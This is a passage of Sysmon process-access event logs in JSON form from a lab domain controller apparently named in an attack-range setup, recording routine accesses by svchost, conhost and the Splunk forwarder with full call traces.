05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-00101A3C0500}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-00101A3C0500}","TargetProcessId":"4440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.309\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-00101A3C0500}\r\nSourceProcessId: 4440\r\nSourceThreadId: 4444\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.309","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-00101A3C0500}","SourceProcessId":"4440","SourceThreadId":"4444","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
